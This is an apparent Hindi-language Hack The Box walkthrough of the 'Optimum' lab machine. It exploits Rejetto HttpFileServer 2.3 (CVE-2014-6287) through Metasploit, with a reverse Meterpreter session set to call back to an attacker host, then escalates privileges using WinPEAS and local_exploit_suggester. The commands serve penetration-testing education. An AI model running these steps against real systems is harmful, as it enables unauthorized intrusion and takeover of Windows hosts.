
# हैक द बॉक्स से ऑप्टिमम मशीन का राइटअप यह वॉकथ्रू Rejetto HttpFileServer 2.3 (CVE-2014-6287) के शोषण के माध्यम से प्रारंभिक पहुंच प्राप्त करने को कवर करता है, इसके बाद एन्यूमरेशन तकनीकों और पोस्ट-एक्सप्लॉइटेशन टूल्स का उपयोग करके विंडोज होस्ट पर विशेषाधिकार वृद्धि की जाती है।
इस मशीन में, उद्देश्य एक विंडोज होस्ट पर एक कमज़ोर वेब सेवा का शोषण करके प्रारंभिक पहुँच प्राप्त करना और फिर एडमिनिस्ट्रेटर फ़्लैग प्राप्त करने के लिए विशेषाधिकारों को बढ़ाना है।
हमले के पथ में शामिल थे:
हम खुली सेवाओं की पहचान करने के लिए एक पूर्ण TCP पोर्ट स्कैन से शुरू करते हैं।
nmap -Pn -n -p- --min-rate 5000 -T4 <TARGET_IP>
स्कैन से पोर्ट 80 खुला पता चलता है।
अगला, हम एक सेवा और संस्करण स्कैन करते हैं।
nmap -p80 -sSCV --min-rate 5000 -T4 <TARGET_IP>
परिणाम निम्नलिखित सेवा की पहचान करता है:
HttpFileServer 2.3
यह सेवा Rejetto HTTP File Server से मेल खाती है, जो एक हल्का फ़ाइल-शेयरिंग वेब सर्वर है।
पता लगाए गए संस्करण पर शोध करने के बाद, हम एक ज्ञात कमजोरी पाते हैं:
CVE-2014-6287
यह कमजोरी अनुचित इनपुट सैनिटाइजेशन के कारण रिमोट कोड निष्पादन (Remote Code Execution) की अनुमति देती है।
कमजोरी का शोषण करने के लिए, हम Metasploit का उपयोग करते हैं।
Metasploit प्रारंभ करें:
msfconsole -q
उपयुक्त मॉड्यूल खोजें:
search rejetto
एक्सप्लॉइट मॉड्यूल लोड करें:
use exploit/windows/http/rejetto_hfs_exec
आवश्यक विकल्प कॉन्फ़िगर करें:
set RHOSTS <TARGET_IP>
set RPORT <TARGET_PORT>
set LHOST <ATTACKER_IP>
set LPORT <ATTACKER_PORT>
run
निष्पादित होने पर, एक्सप्लॉइट लक्ष्य मशीन पर एक Meterpreter सत्र प्रदान करता है।
प्राप्त Meterpreter सत्र के साथ, हम उपयोगकर्ता फ़्लैग प्राप्त करने के लिए फ़ाइलसिस्टम नेविगेट करते हैं।
cd
cat user.txt
whoami
कमांड आउटपुट दर्शाता है कि हम इस प्रकार लॉग इन हैं:
kostas
चूँकि इस उपयोगकर्ता के पास प्रशासनिक विशेषाधिकार नहीं हैं, हम विशेषाधिकार वृद्धि (Privilege Escalation) के साथ आगे बढ़ते हैं।
संभावित विशेषाधिकार वृद्धि वैक्टर की पहचान करने के लिए, हम WinPEAS अपलोड करते हैं, जो एक प्रसिद्ध विंडोज विशेषाधिकार वृद्धि गणना उपकरण है।
upload /usr/share/peass/winpeas/winPEAS.exe C:\Users\kostas\Desktop\wp.exe
फिर हम इसे निष्पादित करते हैं:
shell
.\wp.exe
आउटपुट में उपयोगी जानकारी सामने आती है, जिसमें उपयोगकर्ता kostas से जुड़े क्रेडेंशियल्स शामिल हैं।
संभावित वृद्धि वैक्टर की समीक्षा करने के बाद, हम Metasploit मॉड्यूल का उपयोग करते हैं:
local_exploit_suggester
मॉड्यूल लोड करें:
use post/multi/recon/local_exploit_suggester
सत्र कॉन्फ़िगर करें:
set SESSION <SESSION_NUMBER>
run
यह मॉड्यूल उपलब्ध स्थानीय एक्सप्लॉइट्स का सुझाव देता है जिनका उपयोग विशेषाधिकार बढ़ाने के लिए किया जा सकता है।
सफलतापूर्वक विशेषाधिकार बढ़ाने के बाद, हमें प्रशासनिक अधिकारों वाला एक शेल मिलता है।
सत्यापन:
shell
whoami
एक बार प्रशासनिक विशेषाधिकार प्राप्त हो जाने पर, हम रूट फ़्लैग प्राप्त करने के लिए एडमिनिस्ट्रेटर निर्देशिका में नेविगेट करते हैं।
cd \Users\Administrator
dir
cd Desktop
dir
type root.txt
यह मशीन कई महत्वपूर्ण पेनिट्रेशन टेस्टिंग अवधारणाओं को प्रदर्शित करती है: